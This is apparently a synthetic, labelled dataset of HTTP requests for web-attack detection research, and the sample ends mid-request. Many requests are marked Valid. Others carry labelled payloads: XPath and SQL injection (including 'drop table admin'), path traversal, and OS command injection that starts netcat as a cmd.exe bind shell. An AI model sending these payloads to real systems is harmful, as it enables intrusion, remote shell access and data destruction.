Cookie: eorrvaSSco0pidt=945;taieoh7qa0Np0a=luhmvout6tdRkuflt;twhobferc1nuadp=svo/;KzVobjectCN=erhmoa;al4iWb3nrvlrl7w=hHbwhen
Cookie2: $Version="9"
Date: Fri, 03 Feb 06 10:26:17 UTC
ETag: W/"vQad_RvKFgHskRUpwOe"
Expect: eeEemis
From: teiet4@sTvons.de
If-Modified-Since: Mon, 26 May 08 08:56:59 UTC
If-Unmodified-Since: Sat, 12 Apr 08 21:10:30 CET
If-Match: *
If-None-Match: "HqRKqo5aDXQGWLXSfm"
If-Range: "EA41uCJOkJ02D5qWOL.T"
Max-Forwards: 6
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: oeSMne ofl6nn=hilnvs
Authorization: Basic dnJzdnkwYWI6djhvZWVrbng=
Range: 5150-,581355-
Referer: http://ntmtEd1.com/tuieye.php3
TE: chunked;q=0.5
Trailer: Host
User-Agent: sgoeEtaMhnkcto
UA-CPU: StrongARM
UA-Disp: 047,629,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x848
Via: 8zHu/9.9 95.156.66.102, HTTP/2.4 www.vrelem.png
Transfer-Encoding: compress
Upgrade: maOeS/3.9
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 0368215317608
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24588
Start - Id: 27084
class: Valid
GET /rpdn/ePraianztdnrh/acz21h-N/izkW7-gW4HaXAbh/sc3u541Yw6kV_/uaz/neenmSiihibfebie/tn9s2t8VuJq_yV/cSe/atHiYte9e3e/uO/rzieDseli63M.jsp?ahnetdcillei4de=eis%3C&gtesttigti=8&eddide=null%25l&nR3AQSbwindow.open=4680&tiyrnhw1l=iLGBuytkyZ1 HTTP/1.1
Host: www.oYe6yntEt.ch
Connection: ldarn
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: mgsnit='lah'
Client-ip: 98.218.108.15
Cookie: rbsioi=s594L52;Cv1Q3P4aM.7xterm=t:;a4Asil4eFbeRHo=oAlLRx9AF;utelnc=nnehowwe6 ettfbgmocha$6
Cookie2: $Version="392"
Date: Fri, 24 Aug 07 05:56:04 CET
ETag: "1PV7p2VYUMRhRaPPiVn"
Expect: 100-continue
From: iamta@omalrTnosl.biz
If-Modified-Since: Wed, 17 May 06 19:06:08 GMT
If-Unmodified-Since: Fri, 22 Sep 06 08:24:19 GMT
If-Match: "pLwLMj7UbhYNBThZbLru"
If-None-Match: "3bqnJUzQTQt8gEt1B"
If-Range: *
Max-Forwards: 202
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM eXFlc3doQnRub1J0aWRwcnVkYXNvbk9lRnR3VGl0YjRqdGVuM2VlZg==
Authorization: Digest uri=/shisyest/vaartoe/rinrd9ti/iaikiaa.nsf
Range: 47985-64762,7590-,13-
Referer: /tlcm/1nBm/bisotdc.tar
TE: chunked;q=0.7,deflate;q=0.4
Trailer: Upgrade
User-Agent: Mozilla/7.1 (X11; U; SunOS sun4u 4.7; nX-do; rv:8.1.4) Gecko/91124068
UA-CPU: Sparc
UA-Disp: 3070,8448,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0161x6638
Via: an4u/2.1 www.it6f9o.js, 2.4 www.kesbeihl.gif:05242, 6.6 228.38.157.22
Transfer-Encoding: identity
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 544 71.16.165.7 "nle2aZeov" 
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27084
Start - Id: 2094
class: Valid
GET /f@tE5BmWCqxH2EfLw/hiA.k6st3Gh2mH/ixtrii1reo5tntpui/GPuJk-ve/q__tHvVx0/ohEM.Gxmh4QB/oeaord2dp/nV.l-H3gsnKdDGO7vt_r/mQ4TApq8UN6sLlhr6EyX.nsf?bSrh=500&pt=lhj0rcto16e&fgd=1&ctOr=toglasa&rhizodwomnhefsa=h%29tni&unqieusonrh6=8406612084&l0nRleew=oUz&nftdtelcTtmrn=oQ6yts HTTP/1.1
Host: www.ithln4.net:80
Connection: mrdqorb
Accept: audio/basic
Accept-Charset: x-mac-cyrillic, cp-932;q=0.1
Accept-Encoding: 
Accept-Language: o7q80Ri-esoe
Cache-Control: r='Db'
Client-ip: 55.163.3.151
Cookie: nipiseikzlUtmn=a8GbKD;ip=etcodocumentnw os
Cookie2: $Version="329"
Date: Thu, 04 Mar 10 07:42:46 CET
ETag: W/"GbiGXpWdtDauJ0OzWwS"
Expect: 0raee
From: Iosu@aert5hd.ch
If-Modified-Since: Mon, 23 Jan 06 21:51:31 GMT
If-Unmodified-Since: Fri, 25 Sep 09 15:09:50 GMT
If-Match: "qwHvEfuev0wA7kjuTm"
If-None-Match: *
If-Range: "MMb_cut8VeUU7p78"
Max-Forwards: 817
MIME-Version: 0.9
Pragma: r6btwo=n
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: 7n9e hjTsbdrl=tanc
Range: 44-08569,16-
Referer: /Ured/een6n6/iqw3it3a.gif
TE: trailers
Trailer: TE
User-Agent: a-8MW48 http://www.uhtaAC.uk
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3159x969
Via: 4.2 www.eqKtm.png, HTTP/3.7 68.177.153.198:26319, 3.3 www.ceey.shtml
Transfer-Encoding: identity
Upgrade: bnb/4.4, nesz/5.1
Warning: 504 www.Tlt3.js "oelel4epeikc" "Fri, 02 Feb 07 02:11:54 UTC"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 86831
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2094
Start - Id: 48629
class: XPathInjection
PUT /5iageheensu/3.oCKi1Y5Saaccess_logtmp7z/tiuc9v/vNmochalMn_/tolwneemgdod/ewQV/hIng2v2.shtml? HTTP/1.0
Content-Length: 317
Content-Language: r
Content-Encoding: identity
Content-Location: http://www.anbtk.be/tnhltt/eIsda/xEh1e.asp
Content-MD5: aG1lbmVuY2N5dXRFdGN0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Feb 05 16:20:24 GMT
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.y9sLoti.uk:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uiaeeh8y-netEo, cccwi109-i, qo9-ynsh, ik-eVtsi;q=0.8, i-tghcoss;q=0.8
Cache-Control: max-age=9
Client-ip: 212.18.180.154
Cookie: 45=wjapfwgtroslr6eje;HtaTAhttRer4=auadmin;zINJGI=Rvidjlhbt
Cookie2: $Version="46"
Date: Sun, 04 Jan 09 02:08:24 CET
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: wsnewerh@atausf.it
If-Modified-Since: Tue, 05 Jan 10 22:58:45 UTC
If-Unmodified-Since: Fri, 19 Dec 08 23:01:02 CET
If-Match: "5afK2CFx_t3mYcC_K"
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 6801
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: Basic bHQwU3JTTzpSaXhpZWVw
Range: 939-64,563448-00397,65796-
Referer: /x7l2Atc/titip7od.jpg
TE: deflate;q=0.2
Trailer: Referer
User-Agent: r0yito/1.6.0.6
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fsllte/9.8 www.Tctow8.jpg, HTTP/4.6 www.otld.css
Transfer-Encoding: compress
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nca2undsesnSaQ=ihlssd'    or     count(path/child::node()[position(  )=((   i+  j   +    k  + l  +1)] |  path/child::*()[position()=(k+1)])=1    or    'dofre' =' nuyo'  or&ientliy=5516421&yns7lzhaacbNote=egt&IaGtmpotlartcta=rhrnbgsoundh 

End - Id: 48629
Start - Id: 45587
class: PathTransversal
GET /yFisisdt2en2tntV5/g_xzGHRi9uHng_.ZJTLF/Ssulz4ANTJ-htaccesTlL/httpsTUM-xuK/ho1oqtbnraItitaenctt/z@-3qdLSCPucP/yohatcalehy/sOGHeehnni/omEotLcsebvelPc/kpyatMii.pl?ci1r0z2eh3=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Filndriti%2Freneetil%2Ftrisar%2Ftato.sh&zmorewah9e7oa=fevalandttti&mkca5t=%25%2Fejtie%3F&oarudi8hyut4P=9370 HTTP/1.1
Host: 104.231.249.118
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-2;q=0.1, x-mac-arabic;q=0.8
Accept-Encoding: deflate;q=0.5, compress, identity
Accept-Language: hmria-4S;q=0.4, ddhd0eeo-dso, s-o, WuJltex-BeyxsOiy;q=0.0, tlhhi-nlxyb
Cache-Control: no-transform
Client-ip: 181.101.28.152
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="513"
Date: Mon, 16 Apr 07 23:00:27 GMT
ETag: W/"b3lipcZBuzQKnQD6by"
Expect: 100-continue
From: v9zS@tEnsif6n2h.net
If-Modified-Since: Wed, 14 Nov 07 19:53:51 CET
If-Unmodified-Since: Sun, 11 Apr 10 05:48:17 GMT
If-Match: *
If-None-Match: "qKIFnAfIf@bzpURXptw"
If-Range: Mon, 21 Sep 09 01:38:18 GMT
Max-Forwards: 2
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="3e092Ba963B0CA1f5a1fBABba2dDf2bE"
Range: -3163,-605229
Referer: /SdlN8n/abr4e/hL2qdb.php
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: uaarlljrnyQg
UA-CPU: StrongARM
UA-Disp: 911,8166,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: 9.0 www.Usne0nrh.html
Transfer-Encoding: gzip
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 987 134.153.100.236 "eesinenge5NOla6sS" 
X-Forwarded-For: 125.18.205.103
X-Serial-Number: 368281150283459
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45587
Start - Id: 21764
class: Valid
GET /c@-AaPB/zrh7e1rem9/eawaqomvnPHtrmEhe/Rpmdepeeewnqhaiy/luctpI/Ytxogmhahne/aniTfoBenritqio0/knszmohneAtuopd/e0rtac/0d4Ks2K5H-dWU/kuEsf6l8e/ut3EB.msf? HTTP/1.1
Host: www.pipidi.cz:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 36.77.138.78
Cookie: te=i@IXyZwBH@TV;4rwstorr=s7sfte1tgeRvep;efmd=inlpositionttahsw
Cookie2: $Version="772"
Date: Wed, 13 Apr 05 23:25:22 CET
ETag: W/"r_V88P2JeaKByNWW7rSY"
Expect: sh2lodw
From: twiato@ahnEode.ch
If-Modified-Since: Mon, 22 Mar 10 12:12:49 CET
If-Unmodified-Since: Mon, 11 Jul 05 18:43:12 GMT
If-Match: "irDEJt.R1l6YwUZ5Gggx"
If-None-Match: *
If-Range: Wed, 22 Jul 09 22:28:07 UTC
Max-Forwards: 7
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic bnRhbnc3OmV2ZWRl
Range: 4-,-68,1577-
Referer: /tiDnh/yec2hgcu/xzos23fn.jpg
TE: trailers
Trailer: User-Agent
User-Agent: wf9dene (sCBn40HLS2; a2SWt-; bAiISl; qBIjJbCfm)
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: 4.8 171.146.132.44:0937, 0.0 www.b7T6bdre.htm
Transfer-Encoding: deflate
Upgrade: shba/5.1, oaeihe/1.1, eb6t/5.9
Warning: 597 www.rnilf.jpg "annEhbbnde2eoenodht" "Mon, 26 Dec 05 11:59:16 UTC"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 229103908276446605
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21764
Start - Id: 26055
class: Valid
GET /e5fr5@I-_Si8B2UD/ah04@/EXJCautoexecN5tEperl/6cAos/tye5E/6JSPXaAdu-KnDHgBIXNC/nwu-1.html?osedHRtolbhmh=03326&2cmdHq=80911&hOgEdaATe=twm&aEcuwsstnsEtiii=+r%3Eag&gtnrlisRohi=%5By&naaD1o=7sMW&ahva4e=nU_di.&oQ4aW9dusrI1=02&erzpWeeYbRoE=sm HTTP/1.1
Host: 205.176.242.68
Connection: keep-alive
Accept: text/plain;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.6
Cache-Control: 4hGy='efe'
Client-ip: 135.79.240.24
Cookie: fIheiSbRo=dyiei;fclae=tNxFxS;ible= &>&include;Tx6n3q=775962929;pyE=ns2htzts4nhtgToo
Cookie2: $Version="191"
Date: Sat, 02 Oct 04 11:15:36 UTC
ETag: W/"iOXgFK0AsIt_gnbb1GhG"
Expect: 100-continue
From: alLeiF@uTy8difar.biz
If-Modified-Since: Mon, 10 Jul 06 06:51:32 GMT
If-Unmodified-Since: Fri, 28 Mar 08 19:21:17 CET
If-Match: "MYX5qsWCo.be4e@KQM-"
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 1.8
Pragma: tBoSnii='hneOm'
Proxy-Authorization: Digest username="mpdha"
Authorization: NTLM b2Uzckl0aHA2ZW50d2FnbzUyc2V5b25vcmxkMTQyeTJ5c3NJNzI=
Range: 077750-,-78409
Referer: http://Mhaoyit.cz/olaeng.js
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (Windows; U; WinNT 3.6; ie-s9; rv:3.0.5) Gecko/09961194
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 096x0326
Via: FTP/8.6 www.i2hesa.shtml, ryT/0.2 www.f8i4A.html
Transfer-Encoding: gzip
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 217.162.242.84
X-Serial-Number: 6743288486222977
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26055
Start - Id: 23748
class: Valid
GET /atYwpN_/633sYbHN357Djcg3tdy./sVbW1ah5/aDGiO@W2.zWufedE5J/fkySzu1p8si/anP1ooPLz4Ipa44pV8Rd/lw2qhna/T3uu6rtRTxaln/tGn.Le6oPwY7/hMxzLOK6xetbsw-1Kl.cfm?8j=a1OSformuUeeetiedd&lDaqt=8ltythetZ7Thtpassz&ZZGq3V3cSYupdateY=4997&0kedyrEi=t%25hsn&7yirthxte01F=117&yhrheAnicf=370776618&3ile9tnieTe=dgw%26&ushu=15me&yenettitabet=oe&0katnwq8la=slnDservicesdr HTTP/1.0
Host: www.1gnrts.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-japanese;q=0.9, gb2312;q=0.4
Accept-Encoding: deflate, identity, deflate, identity, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 162.99.120.131
Cookie: nnaenneeR=0httpsm
Cookie2: $Version="93"
Date: Thu, 10 Aug 06 15:00:32 GMT
ETag: "uhuVGtTX8ksUIS7R3"
Expect: tteedng=e8dtDpe
From: tddnc@aNensle3pe.org
If-Modified-Since: Sun, 15 Jun 08 12:37:12 UTC
If-Unmodified-Since: Tue, 29 Dec 09 16:31:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 56
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: eeie reun=10ditrSt
Range: 20-,-643631
Referer: /po3po.jsp
TE: gzip;q=0.7,trailers
Trailer: Pragma
User-Agent: dcgDLGY-YW http://www.i9vgretn.be
UA-CPU: x86
UA-Disp: 6313,5810,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/6.6 www.schi.html, 4.6 171.33.138.93
Transfer-Encoding: deflate
Upgrade: eee/2.2, 9lR/4.1
Warning: 901 197.95.217.240:63802 "emiootnaroiSnaeez" "Thu, 20 Apr 06 20:18:25 CET"
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 13224
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23748
Start - Id: 42829
class: OsCommanding
GET /rZdivEP7cGphpPFinput--/_.ou8/rB-@lY3LdM9pGXCa3oG/DD53NJ/mscnrbt5onlN5ml0.gif?y2o4J4nZ_=7i.Yife&rroiassrs1e=tIQ&QoO0=hslytepesi&EetHyoSerralemi=99&@vB9EKwloB=eFVAPKt7L&ltouhsemmznemaa=osv6aGhfrj%40&oWrtyod=21218169&F3p4iframe@XuWc=rZd5nB&jUpoidomce=1ZMOqhB9XQ3&9d5dI=sas&arpcdhohHAetni=%7C+shell%28+%22cmd+%2Fc++c%3AInetpubwwwrootMSISSnc.exe++++-l++++-p+++3627+++++-t+++++-e+++++cmd.exe%22%29++++%7C+++++%27 HTTP/1.1
Host: 216.91.134.214:72
Connection: close
Accept: video/quicktime, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip, gzip;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 188.218.7.177
Cookie: tyuhii=835734;ieszaizpiiiel=38;xtermyF.G@positionNC=60895475;nt7ohlSbObpa8r=sogtmpake'fi$nph-<
Date: Sun, 11 Jul 04 21:16:19 UTC
Expect: bIief
From: deCV@nnnan.ch
If-Modified-Since: Mon, 16 Nov 09 23:24:18 GMT
If-Unmodified-Since: Mon, 16 Nov 09 11:20:49 UTC
If-Match: "qI24.dZDibJe3hmEe"
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 3
MIME-Version: 5.9
Authorization: Basic c3RRbnJzbzppZGxSeDBsWQ==
Referer: /c58a/tReo.nsf
Trailer: Host
User-Agent: 9eex3ymdTQyoit
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: deflate
Upgrade: bnrh/3.5, tht/4.4, eRslr/7.1, uitl/9.3, nply/0.8
X-Forwarded-For: 193.174.253.14
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42829
Start - Id: 41674
class: SqlInjection
GET /iFvSC_w/DVi-aind/aerottoiagensinAexAz/WBy8ZpvPOvb.bin?ZIiNPKW.7PZ=007374839&ojechuI=a%5C7Eoh+rti9om&aeetijeih=609Di-&6au8seyrh=907166827&EssutswrAse=Jlb3hnbftEolii&woQshr0oefp3=17163672&whofam=%27%3B+drop++++table+admin&i1llhkbGY6kg=h%3D&Vni=tzDdxyT%40 HTTP/1.1
Host: www.ewe2eE.ch
Connection: tn3mdy
Accept: video/*;q=0.6, application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: compress, gzip, compress, compress;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 152.95.8.177
Cookie: U98hQ=200411;msseeens=00855412;dobject1H=oh(c37 ;c3susr=r<;v66ywOrLef= ope<odoxvt copymdnph-;51rauktlzoecr=f
Cookie2: $Version="614"
Date: Sun, 19 Apr 09 20:18:23 CET
ETag: "1zVBvOqG3coFp9.PL"
Expect: yet76a=do4DczS;yi2en=hsePcye0
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Tue, 20 Jun 06 12:05:27 UTC
If-Match: *
If-None-Match: "JTc871kzxK_-vKTAjyx"
If-Range: Fri, 27 Jan 06 14:28:43 UTC
Max-Forwards: 3589
MIME-Version: 3.7
Pragma: rlitR9S=noasnay
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: NTLM Qmx0ZVlpaHNkbjBlcWFmZERvTzF0ZTJ5aGRFd3VvaWRpZXJtdQ==
Range: -91,787-299778
Referer: http://www.ngeti.be/tomis/itete/5woea.wmn
TE: deflate,trailers,chunked;q=0.6
Trailer: Host
User-Agent: ftwpfxp/7.5.0.2.4
UA-CPU: MIPS
UA-Disp: 467,9045,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41674
Start - Id: 48878
class: XPathInjection
GET /o7orO0Cpb9B8cm9vm/qlICU/tneiAad1uslE3/rWQvMfwIRB.-0Ovetd/2ox8eOxTde4pen/smA5e1yxd/hLEaBJbEK.shtml?dn7ld0lefs=et%27+++++or++++%28i++%3C++count%28oh%2Fchild%3A%3Atext%28%29%29++and+j++++%3C+++++count%28camew%2Fchild%3A%3Acomment%28%29%29+++and+k++%3C+++count%28ttln8%2Fchild%3A%3A*%29+%29+or+++%27yr%27+++%3D+++%27+czfU%27+++++or&rvaeflApomioa66=dtuuctm5lC%28lmE&baEke0rnal0wet=ar3yaektrsi1oz HTTP/1.1
Host: www.mfs5epae.be:5019
Connection: seee7to
Accept: text/*;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, compress;q=0.0, compress;q=0.0
Accept-Language: *;q=0.1
Cache-Control: max-age=19
Client-ip: 220.116.206.243
Cookie: bgsoundFErftpetcdocumentD=4382346007
Cookie2: $Version="4"
Date: Tue, 24 Feb 09 10:29:52 CET
ETag: "sKTsz7.j7YJ2Nxc"
Expect: 100-continue
From: SeqnAyso@nknWroo.ch
If-Modified-Since: Tue, 12 Sep 06 03:58:56 CET
If-Unmodified-Since: Sun, 11 Oct 09 22:42:21 UTC
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sat, 15 Dec 07 13:54:21 UTC
Max-Forwards: 2
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Basic aTJoaGxzbmI6ZW51cmxkaQ==
Range: 41-,-69
Referer: /hesweit/epetKns/lClahs41/loxmas/eyhrcH.mspx
TE: chunked;q=0.0,trailers,trailers
Trailer: Accept-Charset
User-Agent: vedy5rhubeNcuRilsz4
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 2liq/0.7 218.248.28.11
Transfer-Encoding: dvsA
Upgrade: sot/2.1, durd/1.9, 3esnsy/4.2, ocnwu/9.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48878
Start - Id: 32126
class: Valid
GET /oD.htm?psGt@=3eQi HTTP/1.1
Host: 105.144.130.27
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: toss-piz, bOen-kwwo
Cache-Control: no-cache
Client-ip: 70.112.71.224
Cookie: nmsadrTtlna=7ssaGes7qaDb;eitc9etoa=48829799;zftpWWz=493;eao1d=5Rakisa;esExstl4283=nnGQpP@02Z1I;1fel=neticatnph-
Cookie2: $Version="69"
Date: Sun, 15 Jul 07 02:41:22 CET
ETag: "wFNocMSn@Ml4dBVEYNk"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: leaama@iezirdm.it
If-Modified-Since: Fri, 11 Feb 05 16:34:58 CET
If-Unmodified-Since: Tue, 27 Sep 05 10:48:45 GMT
If-Match: "TblPxxyPQeCZT-e"
If-None-Match: *
If-Range: Thu, 15 Oct 09 17:54:21 CET
Max-Forwards: 3578
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: tNnr otnHi=mpjeha
Range: -158831,4-,452-53031
Referer: http://7ihte.org/cmlEaoe2/ygdhjenn.bin
TE: trailers,chunked;q=0.6,gzip;q=0.4
Trailer: Accept-Language
User-Agent: ogSdaohxwe
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0780x902
Via: 7.1 86.26.88.129, 4.9 168.121.104.120
Transfer-Encoding: EhAho; idbut=hnEeih
Upgrade: anW/4.2, ol7Ee/0.0, eny/4.3
Warning: 844 www.ECasr.js:179 "r0atdh" "Fri, 02 Dec 05 20:31:21 UTC"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32126
Start - Id: 44162
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 201.127.193.148:4171
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.7, hz-gb-2312;q=0.3, x-mac-turkish
Accept-Encoding: 
Accept-Language: EoRRast-ybsayo, aiohouca-iIHwae, 1-ayAgt;q=0.1, takG0eh-u;q=0.9, R9p-ohftiog;q=0.9
Cache-Control: no-cache
Client-ip: 165.243.248.164
Cookie: rdt=6Ostdinlqpand c\tsG
Cookie2: $Version="13"
Date: Thu, 22 Jul 04 08:53:17 CET
ETag: "fs5xbNlo-GIu_ej"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:22:43 GMT
If-Match: *
If-None-Match: "aAFMp_Xb.mqXhubgY2yQ"
If-Range: *
Max-Forwards: 119
MIME-Version: 2.1
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic VXZ3OGVlc2w6Z2I4Yg==
Range: 815-,644-20793
Referer: /eao6i6t/tyifEoEa/ebzr/blig.png
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.4 (X11; U; Linux i386 8.4; aH-cw; rv:8.8.5) Gecko/03455181
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: FTP/8.7 107.152.169.202
Transfer-Encoding: identity
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44162
Start - Id: 42111
class: SqlInjection
GET /ehwhnuWma.aspx?ieeedeainurrAd=o6G&7eo=Rfrt2EhD6rdigrd4ia&wsrr0nab9q=ddageg3bor2ENty&espd=wVXWUqnLd&rfel3a3tduh=OR+++%27fTs%27++++%3D+++%27+++%27&aaUtuKEaSiAti=950&dhtt=mytooAmTt6ts7hw&Agrna2t=3805 HTTP/1.0
Host: 151.170.238.11
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-7, x-mac-roman, iso-10646-ucs-2, euc-kr
Accept-Encoding: *
Accept-Language: na-r, hbE8fpm-t, yRst-Dk3H;q=0.0, kawnuue-rt;q=0.7
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: nrwnnlwow=neav3youlvayoo3Q
Cookie2: $Version="9"
Date: Sat, 29 Sep 07 15:22:34 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: oeeEja9t=tncldfia;etnq3hno=qcai6udr
From: ri9it34@rxsle.fr
If-Modified-Since: Mon, 14 May 07 04:50:50 GMT
If-Unmodified-Since: Thu, 08 Dec 05 04:01:35 GMT
If-Match: "-fbhX_zHP2sTyqN"
If-None-Match: "1hcSvu90ABX8mDmFjHC"
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 457
MIME-Version: 0.9
Pragma: NslsrH='er'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
